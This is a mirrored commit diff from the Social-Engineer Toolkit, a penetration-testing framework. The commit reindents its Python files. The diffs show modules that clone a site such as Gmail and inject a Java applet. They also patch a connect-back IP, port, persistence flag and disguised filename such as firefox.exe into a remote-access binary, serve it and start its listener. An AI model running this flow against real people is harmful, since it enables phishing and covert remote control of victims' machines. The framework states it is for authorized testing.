Mirrors/social-engineer-toolkit
2
0
Fork 0
mirror of https://github.com/trustedsec/social-engineer-toolkit synced 2025-02-16 13:28:36 +00:00
Code Issues Projects Releases Packages Wiki Activity

Fixed spacing using reindent.py on all files

Browse source
This commit is contained in:
TrustedSec 2013-03-16 15:47:25 -04:00
parent 367536ca48
commit b1957556c5
77 changed files with 9815 additions and 9833 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

4
README.txt
View file

@ -4,8 +4,8 @@ Copyright 2013 The Social-Engineer Toolkit (SET)
Written by: David Kennedy (ReL1K) @ www.trustedsec.com
Development Team: Thomas Werth, Joey Furr (j0fer), JR DePre (pr1me)
DISCLAIMER: This is only for testing purposes and can only be used where strict consent has been given. Do not use this for illegal purposes period.
DISCLAIMER: This is only for testing purposes and can only be used where strict consent has been given. Do not use this for illegal purposes period.
Any modifications, changes, or alterations to this application is acceptable, however, any public releases utilizing this code must be approved by TrustedSec. Check the LICENSE file for more information.
The Social-Engineer Toolkit is an open-source penetration testing framework designed for Social-Engineering. SET has a number of custom attack vectors that allow you to make a believable attack in a fraction of the time. SET is a product of TrustedSec, LLC - An Information Security consulting firm located in Cleveland, Ohio.

6
config/set_config.py
View file

@ -4,15 +4,15 @@
## DO NOT MODIFY THIS FILE ##
#######################################################################
# This file is generated by a routine inside SET, for use by SET. #
# #
# #
# Settings should be modified in the set_config file, and then #
# SET updated using the 'Update SET Configuration' menu item in #
# the main menu. This file will be updated with the new settings. #
# #
# set_config.py generated: 2013-03-16 15:24:03.199144 #
# set_config.py generated: 2013-03-16 15:46:18.978776 #
# #
#######################################################################
CONFIG_DATE='2013-03-16 15:24:03.199144'
CONFIG_DATE='2013-03-16 15:46:18.978776'
METASPLOIT_PATH="/opt/metasploit/apps/pro/msf3"
METASPLOIT_DATABASE="postgresql"
ENCOUNT=4

12
config/slim_set.py
View file

@ -7,9 +7,9 @@ import subprocess
#
choice=raw_input("Do you want to slim the size of SET down? This will remove SET interactive payloads and other executables.\nEnter your choice [yes|no]: ")
if choice == "y" or choice == "yes":
if os.path.isfile("src/payloads/set_payloads/set.payload"):
path = "src/payloads/set_payloads/"
if os.path.isfile("../src/payloads/set_payloads/set.payload"):
path = "../src/payloads/set_payloads/"
subprocess.Popen("rm -rf %s/* 1> /dev/null 2> /dev/null" % (path), shell=True).wait()
print "Done. Be sure to change the set_config to SET_PAYLOADS=OFF"
if os.path.isfile("src/payloads/set_payloads/set.payload"):
path = "src/payloads/set_payloads/"
if os.path.isfile("../src/payloads/set_payloads/set.payload"):
path = "../src/payloads/set_payloads/"
subprocess.Popen("rm -rf %s/* 1> /dev/null 2> /dev/null" % (path), shell=True).wait()
print "Done. Be sure to change the set_config to SET_PAYLOADS=OFF"

15
config/update_config.py
View file

@ -23,9 +23,9 @@ definepath = os.getcwd()
# * Booleans should not be quoted
def value_type(value):
""" Determines whether the setting parameter should be quoted. """
return {
'METASPLOIT_PATH':True,
'METASPLOIT_DATABASE':True,
@ -86,17 +86,17 @@ def value_type(value):
}.get(value,"ERROR")
def update_config():
init_file = file("%s/config/set_config" % (definepath), "r")
new_config = file("%s/config/set_config.py" % (definepath), "w")
timestamp = str(datetime.datetime.now())
new_config.write("""#!/usr/bin/python\n
#######################################################################
## DO NOT MODIFY THIS FILE ##
#######################################################################
# This file is generated by a routine inside SET, for use by SET. #
# #
# #
# Settings should be modified in the set_config file, and then #
# SET updated using the 'Update SET Configuration' menu item in #
# the main menu. This file will be updated with the new settings. #
@ -117,9 +117,9 @@ CONFIG_DATE='"""+timestamp+"""'\n""")
value = "False"
else:
pass
quoted = value_type(setting)
if quoted:
new_config.write(setting + '="' + value + '"\n')
else:
@ -140,4 +140,3 @@ CONFIG_DATE='"""+timestamp+"""'\n""")
if __name__ == "__main__":
update_config()

370
modules/ratte_module.py
View file

@ -32,37 +32,37 @@ httpd=None
#
def start_web_server_tw(directory,port):
global httpd
try:
# import the threading, socketserver, and simplehttpserver
import thread,SocketServer,SimpleHTTPServer
# create the httpd handler for the simplehttpserver
# we set the allow_reuse_address incase something hangs can still bind to port
class ReusableTCPServer(SocketServer.TCPServer): allow_reuse_address=True
# specify the httpd service on 0.0.0.0 (all interfaces) on port 80
httpd = ReusableTCPServer(("0.0.0.0", port),SimpleHTTPServer.SimpleHTTPRequestHandler)
# thread this mofo
thread.start_new_thread(httpd.serve_forever,())
# change directory to the path we specify for output path
os.chdir(directory)
global httpd
try:
# import the threading, socketserver, and simplehttpserver
import thread,SocketServer,SimpleHTTPServer
# create the httpd handler for the simplehttpserver
# we set the allow_reuse_address incase something hangs can still bind to port
class ReusableTCPServer(SocketServer.TCPServer): allow_reuse_address=True
# specify the httpd service on 0.0.0.0 (all interfaces) on port 80
httpd = ReusableTCPServer(("0.0.0.0", port),SimpleHTTPServer.SimpleHTTPRequestHandler)
# thread this mofo
thread.start_new_thread(httpd.serve_forever,())
# change directory to the path we specify for output path
os.chdir(directory)
# handle keyboard interrupts
except KeyboardInterrupt:
core.print_info("Exiting the SET web server...")
httpd.socket.close()
# handle keyboard interrupts
except KeyboardInterrupt:
core.print_info("Exiting the SET web server...")
httpd.socket.close()
# handle the rest
#except Exception:
# print "[*] Exiting the SET web server...\n"
# httpd.socket.close()
# handle the rest
#except Exception:
# print "[*] Exiting the SET web server...\n"
# httpd.socket.close()
def stop_web_server_tw():
global httpd
try:
httpd.socket.close()
# handle the exception
except Exception:
httpd.socket.close()
global httpd
try:
httpd.socket.close()
# handle the exception
except Exception:
httpd.socket.close()
#
# This will create the java applet attack from start to finish.
@ -71,164 +71,164 @@ def stop_web_server_tw():
#
def java_applet_attack_tw(website,port,directory,ipaddr):
# clone the website and inject java applet
core.site_cloner(website,directory,"java")
# clone the website and inject java applet
core.site_cloner(website,directory,"java")
############################################
# use customized Ratte nehmen
############################################
############################################
# use customized Ratte nehmen
############################################
# this part is needed to rename the msf.exe file to a randomly generated one
if os.path.isfile("src/program_junk/rand_gen"):
# open the file
fileopen=file("src/program_junk/rand_gen", "r")
# start a loop
for line in fileopen:
# define executable name and rename it
filename=line.rstrip()
# move the file to the specified directory and filename
subprocess.Popen("cp src/payloads//ratte/ratte.binary %s/%s 1> /dev/null 2> /dev/null" % (directory,filename), shell=True).wait()
# this part is needed to rename the msf.exe file to a randomly generated one
if os.path.isfile("src/program_junk/rand_gen"):
# open the file
fileopen=file("src/program_junk/rand_gen", "r")
# start a loop
for line in fileopen:
# define executable name and rename it
filename=line.rstrip()
# move the file to the specified directory and filename
subprocess.Popen("cp src/payloads//ratte/ratte.binary %s/%s 1> /dev/null 2> /dev/null" % (directory,filename), shell=True).wait()
# lastly we need to copy over the signed applet
subprocess.Popen("cp src/program_junk/Signed_Update.jar %s 1> /dev/null 2> /dev/null" % (directory), shell=True).wait()
# lastly we need to copy over the signed applet
subprocess.Popen("cp src/program_junk/Signed_Update.jar %s 1> /dev/null 2> /dev/null" % (directory), shell=True).wait()
#TODO index.html parsen und IPADDR:Port ersetzen
fileopen=open("%s/index.html" % (directory), "rb")
data=fileopen.read()
fileopen.close()
filewrite=open("%s/index.html" % (directory), "wb")
#TODO index.html parsen und IPADDR:Port ersetzen
fileopen=open("%s/index.html" % (directory), "rb")
data=fileopen.read()
fileopen.close()
toReplace=core.grab_ipaddress()+":80"
filewrite=open("%s/index.html" % (directory), "wb")
#replace 3 times
filewrite.write(data.replace(str(toReplace), ipaddr+":"+str(port), 3) )
filewrite.close()
# start the web server by running it in the background
start_web_server_tw(directory,port)
toReplace=core.grab_ipaddress()+":80"
#replace 3 times
filewrite.write(data.replace(str(toReplace), ipaddr+":"+str(port), 3) )
filewrite.close()
# start the web server by running it in the background
start_web_server_tw(directory,port)
#
# Start ratteserver
#
def ratte_listener_start(port):
# launch ratteserver using ../ cause of reports/ subdir
#subprocess.Popen("%s/src/set_payloads/ratte/ratteserver %d" % (os.getcwd(),port), shell=True).wait()
subprocess.Popen("../src/payloads/ratte/ratteserver %d" % (port), shell=True).wait()
# launch ratteserver using ../ cause of reports/ subdir
#subprocess.Popen("%s/src/set_payloads/ratte/ratteserver %d" % (os.getcwd(),port), shell=True).wait()
subprocess.Popen("../src/payloads/ratte/ratteserver %d" % (port), shell=True).wait()
def prepare_ratte(ipaddr,ratteport, persistent,customexe):
core.print_status("preparing RATTE...")
# replace ipaddress with one that we need for reverse connection back
############
#Load content of RATTE
############
fileopen=open("src/payloads/ratte/ratte.binary" , "rb")
data=fileopen.read()
fileopen.close()
############
#PATCH Server IP into RATTE
############
filewrite=open("src/program_junk/ratteM.exe", "wb")
core.print_status("preparing RATTE...")
# replace ipaddress with one that we need for reverse connection back
############
#Load content of RATTE
############
fileopen=open("src/payloads/ratte/ratte.binary" , "rb")
data=fileopen.read()
fileopen.close()
host=int(len(ipaddr)+1) * "X"
rPort=int(len(str(ratteport))+1) * "Y"
pers=int(len(str(persistent))+1) * "Z"
#check ob cexe > 0, sonst wird ein Feld gepatcht (falsch!)
if len(str(customexe)) > 0:
cexe=int(len(str(customexe))+1) * "Q"
else:
cexe=""
############
#PATCH Server IP into RATTE
############
filewrite=open("src/program_junk/ratteM.exe", "wb")
filewrite.write(data.replace(str(cexe), customexe+"\x00", 1).replace(str(pers), persistent+"\x00", 1).replace(str(host), ipaddr+"\x00", 1).replace(str(rPort), str(ratteport)+"\x00", 1) )
filewrite.close()
host=int(len(ipaddr)+1) * "X"
rPort=int(len(str(ratteport))+1) * "Y"
pers=int(len(str(persistent))+1) * "Z"
#check ob cexe > 0, sonst wird ein Feld gepatcht (falsch!)
if len(str(customexe)) > 0:
cexe=int(len(str(customexe))+1) * "Q"
else:
cexe=""
filewrite.write(data.replace(str(cexe), customexe+"\x00", 1).replace(str(pers), persistent+"\x00", 1).replace(str(host), ipaddr+"\x00", 1).replace(str(rPort), str(ratteport)+"\x00", 1) )
filewrite.close()
# def main(): header is required
def main():
valid_site = False
valid_ip = False
valid_persistence = False
input_counter= 0
site_input_counter=0
#pause=raw_input("This module has finished completing. Press <enter> to continue")
# Get a *VALID* website address
while valid_site != True and site_input_counter < 3:
website = raw_input(core.setprompt(["9", "2"], "Enter website to clone (ex. https://gmail.com)"))
site = urlparse.urlparse(website)
if site.scheme == "http" or site.scheme == "https":
if site.netloc != "":
valid_site = True
else:
if site_input_counter == 2:
core.print_error("\nMaybe you have the address written down wrong?" + core.bcolors.ENDC)
sleep(4)
return
else:
core.print_warning("I can't determine the fqdn or IP of the site. Try again?")
site_input_counter += 1
valid_site = False
valid_ip = False
valid_persistence = False
input_counter= 0
site_input_counter=0
#pause=raw_input("This module has finished completing. Press <enter> to continue")
# Get a *VALID* website address
while valid_site != True and site_input_counter < 3:
website = raw_input(core.setprompt(["9", "2"], "Enter website to clone (ex. https://gmail.com)"))
site = urlparse.urlparse(website)
if site.scheme == "http" or site.scheme == "https":
if site.netloc != "":
valid_site = True
else:
if site_input_counter == 2:
core.print_error("\nMaybe you have the address written down wrong?" + core.bcolors.ENDC)
sleep(4)
return
else:
if site_input_counter == 2:
core.print_error("\nMaybe you have the address written down wrong?")
sleep(4)
return
else:
core.print_warning("I couldn't determine whether this is an http or https site. Try again?")
site_input_counter +=1
#core.DebugInfo("site.scheme is: %s " % site.scheme)
#core.DebugInfo("site.netloc is: %s " % site.netloc)
#core.DebugInfo("site.path is: %s " % site.path)
#core.DebugInfo("site.params are: %s " % site.params)
#core.DebugInfo("site.query is: %s " % site.query)
#core.DebugInfo("site.fragment is: %s " % site.fragment)
core.print_warning("I can't determine the fqdn or IP of the site. Try again?")
site_input_counter += 1
else:
if site_input_counter == 2:
core.print_error("\nMaybe you have the address written down wrong?")
sleep(4)
return
else:
core.print_warning("I couldn't determine whether this is an http or https site. Try again?")
site_input_counter +=1
#core.DebugInfo("site.scheme is: %s " % site.scheme)
#core.DebugInfo("site.netloc is: %s " % site.netloc)
#core.DebugInfo("site.path is: %s " % site.path)
#core.DebugInfo("site.params are: %s " % site.params)
#core.DebugInfo("site.query is: %s " % site.query)
#core.DebugInfo("site.fragment is: %s " % site.fragment)
while valid_ip != True and input_counter < 3:
ipaddr = raw_input(core.setprompt(["9", "2"], "Enter the IP address to connect back on"))
valid_ip = core.validate_ip(ipaddr)
if not valid_ip:
if input_counter == 2:
core.print_error("\nMaybe you have the address written down wrong?")
sleep(4)
return
else:
input_counter += 1
#javaport must be 80, cause applet uses in web injection port 80 to download payload!
try:
javaport = int(raw_input(core.setprompt(["9", "2"], "Port Java applet should listen on [80]")))
while javaport == 0 or javaport > 65535:
if javaport == 0:
core.print_warning(text.PORT_NOT_ZERO)
if javaport > 65535:
core.print_warning(text.PORT_TOO_HIGH)
javaport = int(raw_input(core.setprompt(["9", "2"],"Port Java applet should listen on [80]")))
except ValueError:
#core.print_info("Port set to default of 80")
javaport = 80
#javaport=80
while valid_ip != True and input_counter < 3:
ipaddr = raw_input(core.setprompt(["9", "2"], "Enter the IP address to connect back on"))
valid_ip = core.validate_ip(ipaddr)
if not valid_ip:
if input_counter == 2:
core.print_error("\nMaybe you have the address written down wrong?")
sleep(4)
return
else:
input_counter += 1
try:
ratteport = int(raw_input(core.setprompt(["9", "2"], "Port RATTE Server should listen on [8080]")))
while ratteport == javaport or ratteport == 0 or ratteport > 65535:
if ratteport == javaport:
core.print_warning("Port must not be equal to javaport!")
if ratteport == 0:
core.print_warning(text.PORT_NOT_ZERO)
if ratteport > 65535:
core.print_warning(text.PORT_TOO_HIGH)
ratteport = int(raw_input(core.setprompt(["9", "2"], "Port RATTE Server should listen on [8080]")))
except ValueError:
ratteport = 8080
#javaport must be 80, cause applet uses in web injection port 80 to download payload!
try:
javaport = int(raw_input(core.setprompt(["9", "2"], "Port Java applet should listen on [80]")))
while javaport == 0 or javaport > 65535:
if javaport == 0:
core.print_warning(text.PORT_NOT_ZERO)
if javaport > 65535:
core.print_warning(text.PORT_TOO_HIGH)
javaport = int(raw_input(core.setprompt(["9", "2"],"Port Java applet should listen on [80]")))
except ValueError:
#core.print_info("Port set to default of 80")
javaport = 80
#javaport=80
persistent = core.yesno_prompt(["9","2"], "Should RATTE be persistentententent [no|yes]?")
try:
ratteport = int(raw_input(core.setprompt(["9", "2"], "Port RATTE Server should listen on [8080]")))
while ratteport == javaport or ratteport == 0 or ratteport > 65535:
if ratteport == javaport:
core.print_warning("Port must not be equal to javaport!")
if ratteport == 0:
core.print_warning(text.PORT_NOT_ZERO)
if ratteport > 65535:
core.print_warning(text.PORT_TOO_HIGH)
ratteport = int(raw_input(core.setprompt(["9", "2"], "Port RATTE Server should listen on [8080]")))
except ValueError:
ratteport = 8080
# j0fer 06-27-2012 # while valid_persistence != True:
persistent = core.yesno_prompt(["9","2"], "Should RATTE be persistentententent [no|yes]?")
# j0fer 06-27-2012 # while valid_persistence != True:
# j0fer 06-27-2012 # persistent=raw_input(core.setprompt(["9", "2"], "Should RATTE be persistent [no|yes]?"))
# j0fer 06-27-2012 # persistent=str.lower(persistent)
# j0fer 06-27-2012 # if persistent == "no" or persistent == "n":
@ -240,35 +240,35 @@ def main():
# j0fer 06-27-2012 # else:
# j0fer 06-27-2012 # core.print_warning(text.YES_NO_RESPONSES)
customexe=raw_input(core.setprompt(["9", "2"], "Use specifix filename (ex. firefox.exe) [filename.exe or empty]?"))
customexe=raw_input(core.setprompt(["9", "2"], "Use specifix filename (ex. firefox.exe) [filename.exe or empty]?"))
#######################################
# prepare RATTE
#######################################
#######################################
# prepare RATTE
#######################################
prepare_ratte(ipaddr,ratteport,persistent,customexe)
prepare_ratte(ipaddr,ratteport,persistent,customexe)
######################################
# Java Applet Attack to deploy RATTE
#######################################
######################################
# Java Applet Attack to deploy RATTE
#######################################
core.print_info("Starting java applet attack...")
java_applet_attack_tw(website,javaport, "reports/",ipaddr)
core.print_info("Starting java applet attack...")
java_applet_attack_tw(website,javaport, "reports/",ipaddr)
fileopen=file("%s/src/program_junk/rand_gen" % (definepath), "r")
for line in fileopen:
ratte_random = line.rstrip()
subprocess.Popen("cp %s/src/program_junk/ratteM.exe %s/reports/%s" % (definepath,definepath,ratte_random), shell=True).wait()
fileopen=file("%s/src/program_junk/rand_gen" % (definepath), "r")
for line in fileopen:
ratte_random = line.rstrip()
subprocess.Popen("cp %s/src/program_junk/ratteM.exe %s/reports/%s" % (definepath,definepath,ratte_random), shell=True).wait()
#######################
# start ratteserver
#######################
#######################
# start ratteserver
#######################
core.print_info("Starting ratteserver...")
ratte_listener_start(ratteport)
######################
# stop webserver
######################
stop_web_server_tw()
return
core.print_info("Starting ratteserver...")
ratte_listener_start(ratteport)
######################
# stop webserver
######################
stop_web_server_tw()
return

215
modules/ratte_only_module.py
View file

@ -18,133 +18,132 @@ AUTHOR=" Thomas Werth"
#
def ratte_listener_start(port):
subprocess.Popen("src/payloads/ratte/ratteserver %d" % (port), shell=True).wait()
subprocess.Popen("src/payloads/ratte/ratteserver %d" % (port), shell=True).wait()
def prepare_ratte(ipaddr,ratteport, persistent,customexe):
print_info("preparing RATTE...")
# replace ipaddress with one that we need for reverse connection back
############
#Load content of RATTE
############
fileopen=open("src/payloads/ratte/ratte.binary" , "rb")
data=fileopen.read()
fileopen.close()
print_info("preparing RATTE...")
# replace ipaddress with one that we need for reverse connection back
############
#Load content of RATTE
############
fileopen=open("src/payloads/ratte/ratte.binary" , "rb")
data=fileopen.read()
fileopen.close()
############
#PATCH Server IP into RATTE
############
filewrite=open("src/program_junk/ratteM.exe", "wb")
############
#PATCH Server IP into RATTE
############
filewrite=open("src/program_junk/ratteM.exe", "wb")
host=int(len(ipaddr)+1) * "X"
rPort=int(len(str(ratteport))+1) * "Y"
pers=int(len(str(persistent))+1) * "Z"
#check ob cexe > 0, sonst wird ein Feld gepatcht (falsch!)
if len(str(customexe)) > 0:
cexe=int(len(str(customexe))+1) * "Q"
else:
cexe=""
host=int(len(ipaddr)+1) * "X"
rPort=int(len(str(ratteport))+1) * "Y"
pers=int(len(str(persistent))+1) * "Z"
#check ob cexe > 0, sonst wird ein Feld gepatcht (falsch!)
if len(str(customexe)) > 0:
cexe=int(len(str(customexe))+1) * "Q"
else:
cexe=""
filewrite.write(data.replace(str(cexe), customexe+"\x00", 1).replace(str(pers), persistent+"\x00", 1).replace(str(host), ipaddr+"\x00", 1).replace(str(rPort), str(ratteport)+"\x00", 1) )
filewrite.write(data.replace(str(cexe), customexe+"\x00", 1).replace(str(pers), persistent+"\x00", 1).replace(str(host), ipaddr+"\x00", 1).replace(str(rPort), str(ratteport)+"\x00", 1) )
# filewrite.write(data.replace(str(host), ipaddr+"\x00", 1).replace(str(rPort), str(ratteport)+"\x00", 1) )
#filewrite.write(data.replace(str(pers), persistent+"\x00", 1).replace(str(host), ipaddr+"\x00", 1).replace(str(rPort), str(ratteport)+"\x00", 1) )
filewrite.close()
# filewrite.write(data.replace(str(host), ipaddr+"\x00", 1).replace(str(rPort), str(ratteport)+"\x00", 1) )
#filewrite.write(data.replace(str(pers), persistent+"\x00", 1).replace(str(host), ipaddr+"\x00", 1).replace(str(rPort), str(ratteport)+"\x00", 1) )
filewrite.close()
# def main(): header is required
def main():
valid_site = False
valid_ip = False
valid_response = False
input_counter=0
valid_site = False
valid_ip = False
valid_response = False
input_counter=0
#################
# get User Input
#################
#ipaddr=raw_input(setprompt(["9", "2"], "IP address to connect back on"))
while valid_ip != True and input_counter < 3:
ipaddr = raw_input(setprompt(["9", "2"], "Enter the IP address to connect back on"))
valid_ip = validate_ip(ipaddr)
if not valid_ip:
if input_counter == 2:
print_error("\nMaybe you have the address written down wrong?")
sleep(4)
return
else:
input_counter += 1
#################
# get User Input
#################
#ipaddr=raw_input(setprompt(["9", "2"], "IP address to connect back on"))
while valid_ip != True and input_counter < 3:
ipaddr = raw_input(setprompt(["9", "2"], "Enter the IP address to connect back on"))
valid_ip = validate_ip(ipaddr)
if not valid_ip:
if input_counter == 2:
print_error("\nMaybe you have the address written down wrong?")
sleep(4)
return
else:
input_counter += 1
"""try:
ratteport=int(raw_input(setprompt(["9", "2"], "Port RATTE Server should listen on")))
while ratteport==0 or ratteport > 65535:
print_warning('Port must not be equal to javaport!')
ratteport=int(raw_input(setprompt(["9", "2"], "Enter port RATTE Server should listen on")))
except ValueError:
ratteport=8080"""
"""try:
ratteport=int(raw_input(setprompt(["9", "2"], "Port RATTE Server should listen on")))
while ratteport==0 or ratteport > 65535:
print_warning('Port must not be equal to javaport!')
ratteport=int(raw_input(setprompt(["9", "2"], "Enter port RATTE Server should listen on")))
except ValueError:
ratteport=8080"""
try:
ratteport = int(raw_input(setprompt(["9", "2"], "Port RATTE Server should listen on [8080]")))
while ratteport == 0 or ratteport > 65535:
if ratteport == 0:
print_warning(text.PORT_NOT_ZERO)
if ratteport > 65535:
print_warning(text.PORT_TOO_HIGH)
ratteport = int(raw_input(setprompt(["9", "2"],"Enter port RATTE Server should listen on [8080]")))
except ValueError:
#core.print_info("Port set to default of 8080")
ratteport = 8080
try:
ratteport = int(raw_input(setprompt(["9", "2"], "Port RATTE Server should listen on [8080]")))
while ratteport == 0 or ratteport > 65535:
if ratteport == 0:
print_warning(text.PORT_NOT_ZERO)
if ratteport > 65535:
print_warning(text.PORT_TOO_HIGH)
ratteport = int(raw_input(setprompt(["9", "2"],"Enter port RATTE Server should listen on [8080]")))
except ValueError:
#core.print_info("Port set to default of 8080")
ratteport = 8080
"""persistent=raw_input(setprompt(["9", "2"], "Should RATTE be persistent [no|yes]?"))
if persistent == 'no' or persistent == '' or persistent == 'n':
persistent='NO'
"""persistent=raw_input(setprompt(["9", "2"], "Should RATTE be persistent [no|yes]?"))
if persistent == 'no' or persistent == '' or persistent == 'n':
persistent='NO'
else:
persistent='YES'"""
while valid_response != True:
persistent=raw_input(setprompt(["9", "2"], "Should RATTE be persistent [no|yes]?"))
persistent=str.lower(persistent)
if persistent == "no" or persistent == "n":
persistent="NO"
valid_response = True
elif persistent == "yes" or persistent == "y":
persistent="YES"
valid_response = True
else:
persistent='YES'"""
print_warning(text.YES_NO_RESPONSES)
while valid_response != True:
persistent=raw_input(setprompt(["9", "2"], "Should RATTE be persistent [no|yes]?"))
persistent=str.lower(persistent)
if persistent == "no" or persistent == "n":
persistent="NO"
valid_response = True
elif persistent == "yes" or persistent == "y":
persistent="YES"
valid_response = True
else:
print_warning(text.YES_NO_RESPONSES)
valid_response = False
valid_response = False
customexe=raw_input(setprompt(["9", "2"], "Use specifix filename (ex. firefox.exe) [filename.exe or empty]?"))
customexe=raw_input(setprompt(["9", "2"], "Use specifix filename (ex. firefox.exe) [filename.exe or empty]?"))
############
# prepare RATTE
############
prepare_ratte(ipaddr,ratteport,persistent,customexe)
############
# prepare RATTE
############
prepare_ratte(ipaddr,ratteport,persistent,customexe)
print_status("Payload has been exported to src/program_junk/ratteM.exe")
print_status("Payload has been exported to src/program_junk/ratteM.exe")
###################
# start ratteserver
###################
"""prompt=raw_input(setprompt(["9", "2"], "Start the ratteserver listener now [yes|no]"))
if prompt == "yes" or prompt == "" or prompt == "y":
print_info("Starting ratteserver...")
ratte_listener_start(ratteport)"""
while valid_response != True:
prompt=raw_input(setprompt(["9", "2"], "Start the ratteserver listener now [yes|no]"))
prompt=str.lower(prompt)
if prompt == "no" or prompt == "n":
prompt="NO"
print_error("Aborting...")
sleep(2)
valid_response = True
elif prompt == "yes" or prompt == "y":
print_info("Starting ratteserver...")
ratte_listener_start(ratteport)
print_info("Stopping ratteserver...")
sleep(2)
valid_response = True
else:
print_warning("valid responses are 'n|y|N|Y|no|yes|No|Yes|NO|YES'")
###################
# start ratteserver
###################
"""prompt=raw_input(setprompt(["9", "2"], "Start the ratteserver listener now [yes|no]"))
if prompt == "yes" or prompt == "" or prompt == "y":
print_info("Starting ratteserver...")
ratte_listener_start(ratteport)"""
while valid_response != True:
prompt=raw_input(setprompt(["9", "2"], "Start the ratteserver listener now [yes|no]"))
prompt=str.lower(prompt)
if prompt == "no" or prompt == "n":
prompt="NO"
print_error("Aborting...")
sleep(2)
valid_response = True
elif prompt == "yes" or prompt == "y":
print_info("Starting ratteserver...")
ratte_listener_start(ratteport)
print_info("Stopping ratteserver...")
sleep(2)
valid_response = True
else:
print_warning("valid responses are 'n|y|N|Y|no|yes|No|Yes|NO|YES'")

1
readme/CHANGES
View file

@ -10,6 +10,7 @@ version 4.7.1
* standardized metasploit_shellcode to a setcore library and now being used by create_payload.py and powershell/prep.py
* added additional standard ports to the powershell_injection since its much faster to generate now.
* added a new config option called DNS_SERVER which allows you to configure SET as a DNS server and hae all traffic route through it. Just turn it on and you have a full fledged DNS server running.
* fixed indentiation of all python files to standard 4 spaces using reindent.py (thanks Siarc)
~~~~~~~~~~~~~~~~
version 4.7

188
set
View file

@ -10,15 +10,15 @@ import shutil
import re
if not os.path.isdir("reports/"):
os.makedirs("reports")
os.makedirs("reports")
# check to see if we have python-pycrypto
try:
from Crypto.Cipher import AES
from Crypto.Cipher import AES
except ImportError:
print "[!] The python-pycrypto python module not installed. You will loose the ability to use multi-pyinjector."
pass
print "[!] The python-pycrypto python module not installed. You will loose the ability to use multi-pyinjector."
pass
#########################################
@ -39,8 +39,8 @@ update_config()
# chmod routine
if operating_system == "posix":
# change permissions if nix
subprocess.Popen("chmod +x set-automate;chmod +x set-update;chmod +x setup.py;chmod +x set-proxy;chmod +x src/payloads/ratte/ratteserver;chmod +x src/payloads/set_payloads/listener.py", stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
# change permissions if nix
subprocess.Popen("chmod +x set-automate;chmod +x set-update;chmod +x setup.py;chmod +x set-proxy;chmod +x src/payloads/ratte/ratteserver;chmod +x src/payloads/set_payloads/listener.py", stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
start_dns()
@ -49,18 +49,18 @@ start_dns()
for root, dirs, files in os.walk('src/program_junk/'):
for f in files:
try:
match = re.search(".svn|entries|all-wcprops|props|text-base|prop-base|tmp", f)
if not match:
os.unlink(os.path.join(root, f))
match = re.search(".svn|entries|all-wcprops|props|text-base|prop-base|tmp", f)
if not match:
os.unlink(os.path.join(root, f))
# if they are being used then ignore
except: pass
# loop through all the directories
for d in dirs:
try:
match = re.search(".svn|entries|all-wcprops|props|text-base|prop-base|tmp", d)
if not match:
shutil.rmtree(os.path.join(root, d))
match = re.search(".svn|entries|all-wcprops|props|text-base|prop-base|tmp", d)
if not match:
shutil.rmtree(os.path.join(root, d))
except: pass
# if windows then do some stuff
@ -70,13 +70,13 @@ if operating_system == "posix":
# ROOT CHECK
################################################
if os.geteuid() != 0:
print "\n The Social-Engineer Toolkit (SET) - by David Kennedy (ReL1K)"
print "\n Not running as root. \n\nExiting the Social-Engineer Toolkit (SET).\n"
exit_set()
if os.geteuid() != 0:
print "\n The Social-Engineer Toolkit (SET) - by David Kennedy (ReL1K)"
print "\n Not running as root. \n\nExiting the Social-Engineer Toolkit (SET).\n"
exit_set()
if operating_system != "windows":
check_pexpect()
check_pexpect()
# if there isn't a set_config.py file yet, create one
if not os.path.isfile("config/set_config.py"):
@ -92,102 +92,102 @@ filewrite.write("{This is the main SET configuration file for all options used i
filewrite.close()
try:
# Remove old Signed_Updates
if os.path.isfile("src/program_junk/Signed_Update.jar"):
os.remove("src/program_junk/Signed_Update.jar")
# Remove old Signed_Updates
if os.path.isfile("src/program_junk/Signed_Update.jar"):
os.remove("src/program_junk/Signed_Update.jar")
# intitial user menu
if not os.path.isfile("src/agreement4"):
fileopen = file("readme/LICENSE", "r")
for line in fileopen:
print line.rstrip()
# intitial user menu
if not os.path.isfile("src/agreement4"):
fileopen = file("readme/LICENSE", "r")
for line in fileopen:
print line.rstrip()
print bcolors.RED + """
The Social-Engineer Toolkit is designed purely for good and not evil. If you are planning on using this tool for malicious purposes that are
not authorized by the company you are performing assessments for, you are violating the terms of service and license of this toolset. By hitting
print bcolors.RED + """
The Social-Engineer Toolkit is designed purely for good and not evil. If you are planning on using this tool for malicious purposes that are
not authorized by the company you are performing assessments for, you are violating the terms of service and license of this toolset. By hitting
yes (only one time), you agree to the terms of service and that you will only use this tool for lawful purposes only.""" + bcolors.GREEN
choice = raw_input("\nDo you agree to the terms of service [y/n]: ")
if choice == "yes" or choice == "y":
filewrite = file("src/agreement4", "w")
filewrite.write("user accepted")
filewrite.close()
print bcolors.ENDC
else:
print "[!] Exiting the Social-Engineer Toolkit, have a nice day." + bcolors.ENDC
sys.exit()
while 1:
show_banner(define_version,'1')
show_main_menu = create_menu(text.main_text, text.main_menu)
choice = raw_input("\nDo you agree to the terms of service [y/n]: ")
if choice == "yes" or choice == "y":
filewrite = file("src/agreement4", "w")
filewrite.write("user accepted")
filewrite.close()
print bcolors.ENDC
else:
print "[!] Exiting the Social-Engineer Toolkit, have a nice day." + bcolors.ENDC
sys.exit()
# special case of list item 99
print '\n 99) Exit the Social-Engineer Toolkit\n'
while 1:
show_banner(define_version,'1')
show_main_menu = create_menu(text.main_text, text.main_menu)
# mainc ore menu
main_menu_choice = (raw_input(setprompt("0", "")))
# special case of list item 99
print '\n 99) Exit the Social-Engineer Toolkit\n'
# funny
if main_menu_choice == "hugs":
print_warning("Have you given someone a hug today? Remember a hug can change the world.")
pause = raw_input("\nPlease give someone a hug then press {return} to continue.")
# mainc ore menu
main_menu_choice = (raw_input(setprompt("0", "")))
# funny2
if main_menu_choice == "derbycon":
print_warning(bcolors.BOLD + "YAYYYYYYYYYYYYYYYYYYYYYY DerbyCon.\n\nDerbyCon 3.0 -- September 25th through September 29th 2012" + bcolors.ENDC)
pause = raw_input(bcolors.BOLD + "\nDon't miss it! Sep 25 - Sep 29th! Press {return} to continue." + bcolors.ENDC)
# funny
if main_menu_choice == "hugs":
print_warning("Have you given someone a hug today? Remember a hug can change the world.")
pause = raw_input("\nPlease give someone a hug then press {return} to continue.")
# quit out
